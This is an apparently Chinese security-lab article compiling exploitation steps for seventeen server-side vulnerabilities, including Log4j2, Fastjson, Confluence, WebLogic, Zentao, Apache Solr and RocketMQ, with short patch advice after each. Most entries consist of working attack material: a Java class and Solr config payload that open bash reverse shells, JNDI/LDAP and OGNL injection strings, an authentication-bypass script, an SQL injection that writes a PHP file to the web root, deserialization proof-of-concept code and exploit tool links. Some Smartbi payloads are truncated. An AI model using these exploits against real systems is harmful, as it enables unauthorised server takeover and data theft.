来源: YNsec YNsec安全实验室
1、Apache Log4j2 远程代码执行漏洞
Apache Log4j2 是一个开源的 Java 日志框架,被广泛地应用在中间件、开发框架与 Web 应用中。
Apache Log4j2 存在远程代码执行漏洞,该漏洞是由于 Apache Log4j2 某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。
漏洞标签:影响范围广、利用链成熟、历史重大漏洞、接触核心资产概率大
漏洞编号:CVE-2021-44228
漏洞类型:RCE
受影响版本:
-
Apache Log4j2 2.x <= 2.14.1 -
Apache Log4j2 2.15.0-rc1
利用方法:
编辑恶意类,内容如下
importjava.io.BufferedReader;importjava.io.InputStream;importjava.io.InputStreamReader;
public class Exploit{
public Exploit() throws Exception {
Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "bash -i >& /dev/tcp/你的ip地址/9897 0>&1"});
InputStream is = p.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(is));
String line;
while((line = reader.readLine()) != null) {
System.out.println(line);
}
p.waitFor();
is.close();
reader.close();
p.destroy();
}
public static void main(String[] args) throws Exception {
}
}
执行指令
javac Exploit.java python启用http服务,部署恶意类
python3 -m http.server 8080marshalsec 开启 LDAP服务
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://http服务地址:端口/#Exploit" 9999 接收shell的服务器 开启监听
nc -lvvp 9897在目标服务执行payload
${jndi:ldap://LDAP服务地址:LADP服务端口/Exploit}
修复建议
目前,Apache 官方已发布新版本完成漏洞修复,建议及时升级至 2.15.0-rc2
以上版本:https://github.com/apache/logging-log4j2/tags
建议同时采用如下临时措施进行漏洞防范:
-
添加 jvm 启动参数-Dlog4j2.formatMsgNoLookups=true -
在应用 classpath 下添加 log4j2.component.properties 配置文件,文件内容为 log4j2.formatMsgNoLookups=true; -
JDK 使用 11.0.1、8u191、7u201、6u211 及以上的高版本; -
部署使用第三方防火墙产品进行安全防护。
2、Fastjson 远程代码执行漏洞
Fastjson 是阿里巴巴的开源 JSON 解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列 化到 JavaBean。在 Fastjson 1.2.80 及以下版本中存在反序列化漏洞,攻击者可 以在特定依赖下利用此漏洞绕过默认 autoType 关闭限制,从而反序列化有安全
风险的类。
漏洞标签:国产框架、利用链成熟、打点常见、服务器权限相关
漏洞编号:CVE-2022-25845
漏洞类型:RCE
受影响版本:
-
Fastjson ≤ 1.2.80
利用方法:
** **利用 idea 创建 maven 项目 搭建漏洞环境,在 pom 文件中添加
<dependency><groupId>com.alibaba</groupId><artifactId>fastjson</artifactId><version>1.2.82</version></dependency>
创建文件夹 com.example.fastjson,在下面添加两个 java 文件
packagecom.example.fastjson;importjava.io.IOException;publicclassPocextendsException{publicvoidsetName(String str){try{Runtime.getRuntime().exec(str);}catch(IOException e) {e.printStackTrace();}}}
packagecom.example.fastjson;importcom.alibaba.fastjson.JSON;publicclassPocDemo{publicstaticvoidmain(String[] args){String json ="{"@type":"java.lang.Exception","@type":"com.example.fastjson.Poc","name":"calc"}";JSON.parse(json);}}
运行 PocDemo
修复建议
1、升级至版本 FastJson 1.2.83:
https://github.com/alibaba/fastjson/releases/tag/1.2.83
2、升级到 FastJosn v2:
https://github.com/alibaba/fastjson2/releases
3、Atlassian Confluence 远程代码执行漏洞
远程攻击者在未经身份验证的情况下,可构造 OGNL 表达式进行注入,实现在 Confluence Server 或 Data Center 上执行任意代码。
漏洞标签:利用链成熟、历史重大漏洞、服务器权限相关
漏洞编号:CVE-2022-26134
漏洞类型:RCE
受影响版本:
-
Confluence Server / Data Center 1.3.0 < 7.4.17 -
Confluence Server / Data Center 7.13.0 < 7.13.7 -
Confluence Server / Data Center 7.14.0 < 7.14.3 -
Confluence Server / Data Center 7.15.0 < 7.15.2 -
Confluence Server / Data Center 7.16.0 < 7.16.4 -
Confluence Server / Data Center 7.17.0 < 7.17.4 -
Confluence Server / Data Center 7.18.0 < 7.18.1
利用方法:
POC数据包
GET //%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1Host: XX.XX.XX.XXUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=3764D915B037D5A50D8025AA793E990AConnection: close
github利用脚本:
https://github.com/Nwqda/CVE-2022-26134
修复建议
官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,参考官方升级
说明,酌情升级至安全版本:
-
Confluence Server / Data Center >= 7.4.17 -
Confluence Server / Data Center >= 7.13.7 -
Confluence Server / Data Center >= 7.14.3 -
Confluence Server / Data Center >= 7.15.2 -
Confluence Server / Data Center >= 7.16.4 -
Confluence Server / Data Center >= 7.17.4 -
Confluence Server / Data Center >= 7.18.1
4、Apache Commons Text 远程代码执行漏洞
当使用 Apache Commons Text 中的字符串替换功能时,一些可用的插值器可以触发网络访问或代码执行。如果应用程序在传递给替换的字符串中包含用户输入而未对其进行适当清理,则攻击者将允许攻击者触发这些插值器。
漏洞标签:供应链风险、历史重大漏洞、利用链成熟、服务器权限相关
漏洞编号:CVE-2022-42889
漏洞类型:RCE
受影响版本:
-
1.5.0 ≤ Apache Commons Text < 1.10.0
利用方法:
payload
search=${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
url编码
search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D
可以尝试
search=${url:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
search=${dns:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
修复建议
官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。
5、Apache Airflow 远程代码执行漏洞
Apache Airflow 是一个可编程,调度和监控的工作流平台,基于有向无环图(DAG),Airflow 可以定义一组有依赖的任务,按照依赖依次执行。当攻击者可访问到 Apache Airflow 的后台 UI,且环境中存在默认 dag 时,可构造恶意请求借助 run_id 执行任意命令。
漏洞标签:历史重大漏洞、利用链成熟、服务器权限相关
漏洞编号:CVE-2022-40127
漏洞类型:RCE
受影响版本:
-
Airflow < 2.4.0
利用方法:
payload
{"lab":"";curl `uname`.****.dnslog.pw;""}
修复建议
官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。
6、ThinkPHP 命令执行漏洞
该漏洞是由于 Thinkphp 开启了多语言功能,并且对参数 lang 传参过滤不严谨,导致攻击者可利用该漏洞执行命令。
漏洞标签:国产框架、服务器权限相关、打点常见
漏洞编号:CNVD-2022-86535
漏洞类型:RCE
受影响版本:
-
ThinkPHP ThinkPHP >=V6.0.1,<=V6.0.13 -
ThinkPHP ThinkPHP >=V5.0.X,<=V5.1.X
利用方法:
payload
/index?lang=…/…/…/…/…/…/…/…/usr/local/lib/php/pearcmd&+config-create+/&/+/var/www/html/test.php
修复建议
如不需要多语言功能,请及时关闭此功能,可参考官方文档:
https://www.kancloud.cn/manual/thinkphp6_0/1037637
https://static.kancloud.cn/manual/thinkphp5/118132
官方已发布漏洞补丁及修复版本,可以评估业务是否受影响后,酌情升级至安全版本
7、WebLogic 远程代码执行漏洞
由于 Weblogic T3/IIOP 协议支持远程对象通过 bind 方法绑定到服务端,并且可以通过 lookup 方法查看,当远程对象继承自 OpaqueReference 类,使用 lookup 方法查看远程对象时,服务端会调用远程对象的 getReferent 方法。weblogic.deployment.jms.ForeignOpaqueReference 继承自OpaqueReference 类,同时实现了getReferent 方法,并且存在 retVal = context.lookup(this.remoteJNDIName)实现,故可以通过 rmi/ldap 远程协议进行远程命令执行。
漏洞标签:利用链成熟、服务器权限相关、打点常见、供应链风险
漏洞编号:CVE-2023-21839
漏洞类型:RCE
受影响版本:
-
Oracle WebLogic Server 12.2.1.3.0 -
Oracle WebLogic Server 12.2.1.4.0 -
Oracle WebLogic Server 14.1.1.0.0
利用方法:
检测工具
https://github.com/4ra1n/CVE-2023-21839
使用官方提供的工具需要使用go语言编译
cd cmdgo build -o CVE-2023-21839.exe
CVE-2023-21839.exe -ip 目标IP -port 目标端口 -ldap DSNlog地址
回显验证,可反弹shell
需要使用JNDIExploit-1.4-SNAPSHOT.jar工具启动ladp服务
https://github.com/WhiteHSBG/JNDIExploit
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 服务器ipnc -lvvp 端口java -jar Weblogic-CVE-2023-21839.jar IP:7001 ldap://ldap服务器IP:1389/Basic/ReverseShell/ldap服务器IP/nc监听端口
修复建议
如不依赖 T3 协议进行通信,可通过阻断 T3 协议和关闭 IIOP 协议端口防止
漏洞攻击,方法如下:1. 禁用 T3 协议:进入 Weblogic 控制台,在 base_domain配置页面中,进入“安全”选项卡页面,点击“筛选器”,配置筛选器,然后在连接筛选器中输入:weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则框中输入:* * 7001 deny t3 t3s。2. 关闭 IIOP 协议端口:在 WebLogic 控制台中,选择“服务”->”AdminServer”->”协议”,取消“启用 IIOP”的勾选,并重启 WebLogic项目,使配置生效。官方已发布漏洞补丁及修复版本,可以评估业务是否受影响后,酌情升级至安全版本。
8、禅道项目管理系统远程命令执行漏洞
禅道项目管理系统存在远程命令执行漏洞,该漏洞源于在认证过程中未正确退出程序,导致了认证绕过,并且后台中有多种执⾏命令的⽅式,攻击者可利用该漏洞在目标服务器上注入任意命令,实现未授权接管服务器。
漏洞标签:国产OA、国产框架、服务器权限相关、打点常见、利用链成熟
漏洞编号:CNVD-2023-02709
漏洞类型:RCE
受影响版本:
-
杭州易软共创网络科技有限公司 禅道项目管理系统 >=17.4,<=18.0.beta1(开源版) -
杭州易软共创网络科技有限公司 禅道项目管理系统 >=7.4,<=8.0.beta1(企业版) -
杭州易软共创网络科技有限公司 禅道项目管理系统 >=3.4,<=4.0.beta1(旗舰版)
利用方法:
权限绕过poc
importrequests
header={
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5408.146 Safari/537.36',
}
def bypasscookie(url,session):
target=url+"/index.php?m=misc&f=captcha&sessionVar=user"
r=session.get(target,headers=header)
zentaosid=r.cookies.get_dict()['zentaosid']
print(zentaosid)
header["Cookie"]="zentaosid="+zentaosid
resp=session.get(url+"/index.php?m=my&f=index",headers=header)
if "/shandao/www/index.php?m=user&f=login" not in resp.text:
print("绕过登陆验证")
else:
print("无法绕过验证")
if __name__ == '__main__':
url="http://127.0.0.1:8081/shandao/www/"
session=requests.Session()
bypasscookie(url,session)
后台RCE:
先创建Gitlab代码库,拿到repoID
POST /shandao/www/index.php?m=repo&f=create&objectID=0&tid=rmqcl0ss HTTP/1.1Host: 127.0.0.1:8081User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://127.0.0.1:8081/shandao/www/index.php?m=repo&f=create&objectID=0&tid=rmqcl0ssContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 144Origin: http://127.0.0.1:8081Connection: closeCookie: lang=zh-cn; device=desktop; theme=default; tab=devops; preCaseLibID=1; lastCaseLib=1; checkedItem=; goback=%7B%22devops%22%3A%22http%3A%5C%2F%5C%2F127.0.0.1%3A8081%5C%2Fshandao%5C%2Fwww%5C%2Findex.php%3Fm%3Drepo%26f%3Dbrowse%26repoID%3D1%26branchID%3D%26objectID%3D0%26tid%3Dvwy3ton6%22%7D; zentaosid=r3094u5448167shtdrur4c7b6q; repoBranch=master; windowWidth=1453; windowHeight=844Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin
product%5B%5D=1&SCM=Gitlab&serviceProject=wangnima&name=wangnima2333&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid=63e4a18218a68
创建好后,去到
http://127.0.0.1:8081/shandao/www/index.php?m=repo&f=maintain&tid=rmqcl0ss查看repoID并进入编辑
POST /shandao/www/index.php?m=repo&f=edit&repoID=8&objectID=0&tid=rmqcl0ss HTTP/1.1Host: 127.0.0.1:8081User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://127.0.0.1:8081/shandao/www/index.php?m=repo&f=edit&repoID=8&objectID=0&tid=rmqcl0ssContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 222Origin: http://127.0.0.1:8081Connection: closeCookie: lang=zh-cn; device=desktop; theme=default; tab=devops; preCaseLibID=1; lastCaseLib=1; checkedItem=; goback=%7B%22devops%22%3A%22http%3A%5C%2F%5C%2F127.0.0.1%3A8081%5C%2Fshandao%5C%2Fwww%5C%2Findex.php%3Fm%3Drepo%26f%3Dbrowse%26repoID%3D1%26branchID%3D%26objectID%3D0%26tid%3Dvwy3ton6%22%7D; zentaosid=r3094u5448167shtdrur4c7b6q; repoBranch=master; windowWidth=1453; windowHeight=844Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin
product%5B%5D=1&SCM=Subversion&serviceHost=&name=wangnima2333&path=http%3A%2F%2F123.4.5.6&encoding=utf-8&client=%60open+%2FSystem%2FApplications%2FCalculator.app%60&account=&password=&encrypt=base64&desc=&uid=63e4a26b5fd65
修复建议
1、进行官方升级:
具体升级方法:https://www.zentao.net/book/zentaoprohelp/41.html
2、安全产品升级:
部分厂商安全产品具备识别该漏洞功能,进行版本升级至最新版。
3、临时防护措施:
可在 module/common/model.php 文件中 echo $endResponseException->getContent();后面加上 exit(); 来修复权限绕过漏洞。
9、Smartbi 远程命令执行漏洞
Smartbi 大数据分析平台存在远程命令执行漏洞,未经身份认证的远程攻击
者可利用 stub 接口构造请求绕过补丁限制,进而控制 JDBC URL,最终可导致远
程代码执行或信息泄露。
漏洞标签:国产OA、服务器权限相关、打点常见、利用链成熟
漏洞编号:无
漏洞类型:RCE
受影响版本:
-
v7 <= Smartbi <= v10.5.8
利用方法:
poc
POST /smartbi/vision/RMIServlet?windowUnloading=&%7a%44%70%34%57%70%34%67%52%69%70%2b%69%49%70%69%47%5a%70%34%44%52%77%36%2b%2f%4a%修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://www.smartbi.com.cn/patchinfo
10、Apache Dubbo 反序列化远程代码执行漏洞
由于 Dubbo 泛型调用中存在反序列化漏洞,未经身份验证的攻击者可以通过构造特殊的请求利用此漏洞,造成远程代码执行,从而获取远程服务器的权限。
漏洞标签:服务器权限相关、利用链成熟
漏洞编号:CVE-2023-23638
漏洞类型:RCE
受影响版本:
-
2.7.0 <= Apache Dubbo <= 2.7.21 -
3.0.0 <= Apache Dubbo <= 3.0.13 -
1.0 <= Apache Dubbo <= 3.1.5
利用方法:
poc
publicclassGenericCallConsumer{
private static GenericService genericService;
public static void main(String[] args) throws Exception {
invokeSayHello1();
invokeSayHello2();
}
public static void setGenericService(boolean haveNJ){
ApplicationConfig applicationConfig = new ApplicationConfig();
applicationConfig.setName("generic-call-consumer");
RegistryConfig registryConfig = new RegistryConfig();
registryConfig.setAddress("zookeeper://127.0.0.1:2181");
ReferenceConfig<GenericService> referenceConfig = new ReferenceConfig<>();
referenceConfig.setInterface("org.apache.dubbo.samples.generic.call.api.HelloService");
applicationConfig.setRegistry(registryConfig);
referenceConfig.setApplication(applicationConfig);
referenceConfig.setGeneric(true);
referenceConfig.setAsync(true);
referenceConfig.setTimeout(7000);
if(haveNJ){
//dubbo 3.x 下面配置生效
referenceConfig.setGeneric("nativejava");
}
genericService = referenceConfig.get();
}
/* //payload1
public static void invokeSayHello1() throws Exception {
setGenericService(false);
RpcContext.getContext().setAttachment("generic", "bean");
Properties properties = new Properties();
properties.setProperty("dubbo.security.serialize.generic.native-java-enable", String.valueOf(true));
JavaBeanDescriptor javaBeanDescriptor = new JavaBeanDescriptor();
javaBeanDescriptor.setClassName("org.apache.dubbo.common.utils.ConfigUtils");
javaBeanDescriptor.setProperty("properties",properties);
setFieldValue(javaBeanDescriptor,"type",7);
Object result = genericService.$invoke("sayHello", new String[]{"org.apache.dubbo.common.beanutil.JavaBeanDescriptor"}, new Object[]{javaBeanDescriptor});
CountDownLatch latch = new CountDownLatch(1);
CompletableFuture<String> future = RpcContext.getContext().getCompletableFuture();
future.whenComplete((value, t) -> {
System.err.println("invokeSayHello(whenComplete): " + value);
latch.countDown();
});
System.err.println("invokeSayHello(return): " + result);
latch.await();
}*/
//payload1 ConfigUtils.setProperties
/*
public static void invokeSayHello1() throws Exception {
setGenericService(false);
Properties properties = new Properties();
properties.setProperty("dubbo.security.serialize.generic.native-java-enable", "true");
HashMap pojoMap = new HashMap();
pojoMap.put("class","org.apache.dubbo.common.utils.ConfigUtils");
pojoMap.put("properties", PojoUtils.generalize(properties));
Object result = genericService.$invoke("sayHello", new String[]{"java.lang.String"}, new Object[]{pojoMap});
CountDownLatch latch = new CountDownLatch(1);
CompletableFuture<String> future = RpcContext.getContext().getCompletableFuture();
future.whenComplete((value, t) -> {
System.err.println("invokeSayHello(whenComplete): " + value);
latch.countDown();
});
System.err.println("invokeSayHello(return): " + result);
latch.await();
}
*/
//payload1 System.setProperties
public static void invokeSayHello1() throws Exception {
setGenericService(false);
Properties properties = System.getProperties();
properties.put("dubbo.security.serialize.generic.native-java-enable", "true");
HashMap pojoMap = new HashMap();
pojoMap.put("class","java.lang.System");
pojoMap.put("properties", PojoUtils.generalize(properties));
Object result = genericService.$invoke("sayHello", new String[]{"java.lang.String"}, new Object[]{pojoMap});
CountDownLatch latch = new CountDownLatch(1);
CompletableFuture<String> future = RpcContext.getContext().getCompletableFuture();
future.whenComplete((value, t) -> {
System.err.println("invokeSayHello(whenComplete): " + value);
latch.countDown();
});
System.err.println("invokeSayHello(return): " + result);
latch.await();
}
//payload2
public static void invokeSayHello2() throws Exception {
setGenericService(true);
//dubbo 2.x 下面配置生效
RpcContext.getContext().setAttachment("generic", "nativejava");
byte[] payload = getBytesByFile("CC2.ser");
Object result = genericService.$invoke("sayHello", new String[]{"java.lang.String"}, new Object[]{payload});
CountDownLatch latch = new CountDownLatch(1);
CompletableFuture<String> future = RpcContext.getContext().getCompletableFuture();
future.whenComplete((value, t) -> {
System.err.println("invokeSayHello(whenComplete): " + value);
latch.countDown();
});
System.err.println("invokeSayHello(return): " + result);
latch.await();
}
public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
Field field = obj.getClass().getDeclaredField(fieldName);
field.setAccessible(true);
field.set(obj, value);
}
public static byte[] getBytesByFile(String pathStr) {
File file = new File(pathStr);
try {
FileInputStream fis = new FileInputStream(file);
ByteArrayOutputStream bos = new ByteArrayOutputStream(1000);
byte[] b = new byte[1000];
int n;
while ((n = fis.read(b)) != -1) {
bos.write(b, 0, n);
}
fis.close();
byte[] data = bos.toByteArray();
bos.close();
return data;
} catch (Exception e) {
e.printStackTrace();
}
return null;
}
}
工具
https://github.com/YYHYlh/Apache-Dubbo-CVE-2023-23638-exp/
修复建议
官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级
至安全版本,建议您在升级前做好数据备份工作,避免出现意外。
https://github.com/apache/dubbo/releases
1.限制用户输入,过滤恶意数据,可以减少攻击者利用反序列化漏洞的可能性。
2.配置黑白名单,限制可序列化的类集合。
3.使用 Java 的安全管理器(SecurityManager)来限制反序列化操作的
权限,例如限制访问文件系统、网络等操作。
11、Apache Druid 远程代码执行漏洞
该漏洞源于 Apache Kafka Connect JNDI 注入漏洞(CVE-2023-25194),Apache Druid 由于支持从 Kafka 加载数据,刚好满足其利用条件,攻击者可通过修改Kafka 连接配置属性进行 JNDI 注入攻击,进而在服务端执行任意恶意代码。
漏洞标签:服务器权限相关、数据库权限相关、涉及重点系统
漏洞编号:QVD-2023-9629
漏洞类型:RCE
受影响版本:
-
Apache Druid <= 25.0.0
利用方法:
poc
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0Accept-Encoding: gzip, deflateContent-Type: application/jsonContent-Length: 1437Connection: close
{
"type":"kafka",
"spec":{
"type":"kafka",
"ioConfig":{
"type":"kafka",
"consumerProperties":{
"bootstrap.servers":"1.1.1.1:9092",
"sasl.mechanism":"SCRAM-SHA-256",
"security.protocol":"SASL_SSL",
"sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url="ldap://x.x.x.x" useFirstPass="true" serviceName="x" debug="true" group.provider.url="xxx";"
},
"topic":"any",
"useEarliestOffset":true,
"inputFormat":{
"type":"regex",
"pattern":"([\s\S]*)",
"listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
"columns":[
"raw"
]
}
},
"dataSchema":{
"dataSource":"sample",
"timestampSpec":{
"column":"!!!_no_such_column_!!!",
"missingValue":"1970-01-01T00:00:00Z"
},
"dimensionsSpec":{
},
"granularitySpec":{
"rollup":false
}
},
"tuningConfig":{
"type":"kafka"
}
},
"samplerConfig":{
"numRows":500,
"timeoutMs":15000
}
}
user.provider.url处填写你的恶意ldap服务url
修复建议
-
避免 Apache Druid 开放至公网。 -
开启身份认证机制,可参考官方文档:https://druid.apache.org/docs/latest/development/extensions-core/druid-basic-security.html
12、瑞友天翼应用虚拟化系统远程代码执行漏洞
瑞友天翼应用虚拟化系统是基于服务器计算架构的应用虚拟化平台,它将用户各种应用软件集中部署到瑞友天翼服务集群,客户端通过 WEB 即可访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等。未经身份认证的远程攻击者可以利用系统中存在的 SQL 注入漏洞,写入后门文件,从而执行远程代码。
漏洞标签:服务器权限相关、利用链成熟、涉及重点系统
漏洞编号:无
漏洞类型:RCE
受影响版本:
-
5.x <= 瑞友天翼应用虚拟化系统 <= 7.0.3.1
利用方法:
poc
importrequestsimportsys
url = sys.argv[1]
payload="/AgentBoard.XGI?user=-1%27+union+select+1%2C%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5C1.php%22+--+-&cmd=UserLogin"
repose = requests.get(url=url+payload)
if repose.status_code ==200:
a = url + '1.php'
b = requests.get(url=a)
if b.status_code == 200:
print('[+] 漏洞存在,验证地址: {}1.php '.format(url))
payload
GET /AgentBoard.XGI?user=-1%27+union+select+1%2C%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27+into+outfile+%22C%3A%5C%5CProgram%5C+Files%5C+%5C%28x86%5C%29%5C%5CRealFriend%5C%5CRap%5C+Server%5C%5CWebRoot%5C%5C2.php%22+--+-&cmd=UserLogin HTTP/1.1Host: xx.xx.xx.xxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: CookieLanguageName=ZH-CN; CookieAuthType=0Upgrade-Insecure-Requests: 1
修复建议
-
避免将该系统开放至公网。 -
官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,建议您在升级前做好数据备份工作,避免出现意外,酌情升级至安全版本:http://soft.realor.cn:88/Gwt7.0.4.1.exe
13、Apache Superset 身份认证绕过漏洞
这个漏洞是由于默认配置的 SECRET_KEY 不安全所导致的。如果管理员没有根据安装说明更改默认配置的 SECRET_KEY,则攻击者可以通过身份验证并访问未经授权的资源或执行恶意代码。
漏洞标签:利用链成熟
漏洞编号:CVE-2023-27524
漏洞类型:认证绕过
受影响版本:
-
Apache Superset <= 2.0.1
利用方法:
漏洞利用工具 :https://github.com/horizon3ai/CVE-2023-27524
修复建议
-
修改默认的 SECRET_KEY,参考官方文档:https://superset.apache.org/docs/installation/configuring-superset/#secret_key-rotation -
官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。https://downloads.apache.org/superset/
14、Apache Solr 代码执行漏洞
Solr 以 Solrcloud 模式启动且可出网时,未经身份验证的远程攻击者可以通过发送特制的数据包进行利用,最终在目标系统上远程执行任意代码。
漏洞标签:利用链成熟、涉及重点系统、服务器权限相关
漏洞编号:CNVD-2023-27598
漏洞类型:RCE
受影响版本:
-
8.10.0 <= Apache Solr < 9.2.0
利用方法:
使用postCommit来命令执行
POST /solr/demo/config HTTP/1.1Host: 192.168.1.92:8983Content-Length: 180Content-Type: application/json
{"add-listener":{"event":"postCommit","name":"suiyi","class":"solr.RunExecutableListener","exe":"bash","dir":"/bin/","args":["-c", "bash -i >& /dev/tcp/192.168.1.92/6666 0>&1"]}}
** **通过newSearcher命令执行
POST /solr/demo/config HTTP/1.1Host: 192.168.1.92:8983Content-Length: 170Content-Type: application/json
{"add-listener":{"event":"newSearcher","name":"newSearcher3","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "ping -c 3 x9hr3z.dnslog.cn"]}}
修复建议
如果未使用 ConfigSets API,请禁用 UPLOAD 命令,将系统属性:configset.upload.enabled 设置为 false ,详细参考:https://lucene.apache.org/solr/guide/8_6/configsets-api.html
使用身份验证/授权,详细参考:https://lucene.apache.org/solr/guide/8_6/authentication-and-authorization-plu
gins.html
官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本:
https://github.com/apache/solr/releases/tag/releases/solr/9.2.0
15、Apache RocketMQ 远程代码执行漏洞
RocketMQ 5.1.0 及以下版本在一定条件下存在远程命令执行风险。RocketMQ的 NameServer、Broker、Controller 等多个组件暴露在外网且缺乏权限验证,攻击者可以利用此缺陷通过「更新配置」功能修改配置路径,进而以系统用户身份执行任意命令(伪造 RocketMQ 协议也可执行任意命令)。
漏洞标签:利用链成熟、涉及重点系统、服务器权限相关、影响范围广
漏洞编号:CVE-2023-33246
漏洞类型:RCE
受影响版本:
-
5.0.0 <= Apache RocketMQ <= 5.1.0 -
4.0.0 <= Apache RocketMQ <= 4.9.5
利用方法:
exp
https://github.com/SuperZero/CVE-2023-33246
使用方法
java -jar CVE-2023-33246.jar -ip "127.0.0.1" -cmd "注入的命令"修复建议
-
RocketMQ 的 NameServer、Broker、Controller 组件非必要不暴露在公网。同时,建议增加访问权限认证。 -
官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本:https://rocketmq.apache.org/download
16、NginxWebUI runCmd 远程代码执行漏洞
该漏洞源于开发人员没有对 runCmd 接口处传入的参数进行有效过滤,攻击者可在无需登录的情况下绕过路由权限校验,通过拼接语句的方式执行任意命令,最终控制服务器。
漏洞标签:利用链成熟、历史重大漏洞、服务器权限相关、影响范围广
漏洞编号:CVE-2023-33246
漏洞类型:RCE
受影响版本:
-
nginxWebUI < 3.5.1(v3.5.1 版本修复了登陆绕过漏洞,但是 RCE 漏洞在最新版本(v3.6.5)中仍可绕过防护进行利用)
利用方法:
poc
GET /AdminPage/conf/runCmd?cmd=执行的命令%26%26echo%20nginx HTTP/1.1Host: your-ipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
检测工具
https://github.com/chaitin/xpoc
修复建议
-
通过设置安全组功能,仅对可信地址和内网开放 nginxWebUI 来缓解风险。 -
官方已发布漏洞补丁及修复版本,但组件修复不完全,防护机制可被绕过,且其他接口仍存在多个高危漏洞。因此建议受漏洞影响的用户及时关注厂商公告并及时更新 NginxWebUI:http://file.nginxwebui.cn/nginxWebUI-3.6.5.jar
17、Smartbi 商业智能软件绕过登录漏洞
该漏洞源于 Smartbi 默认存在内置用户,在使用特定接口时,攻击者可绕过用户身份认证机制获取内置用户身份凭证,随后可使用获取的身份凭证调用后台接口,最终可能导致敏感信息泄露和代码执行。
漏洞标签:利用链成熟、国产系统、影响范围广
漏洞编号:无
漏洞类型:认证绕过
受影响版本:
-
V7 <= Smartbi <=V10
利用方法:
验证漏洞是否存在
http://your-ip/smartbi/vision/RMIServlet出现以下回显证明漏洞存在
{"retCode":"CLIENT_USER_NOT_LOGIN","result":"尚未登录或会话过期"}poc
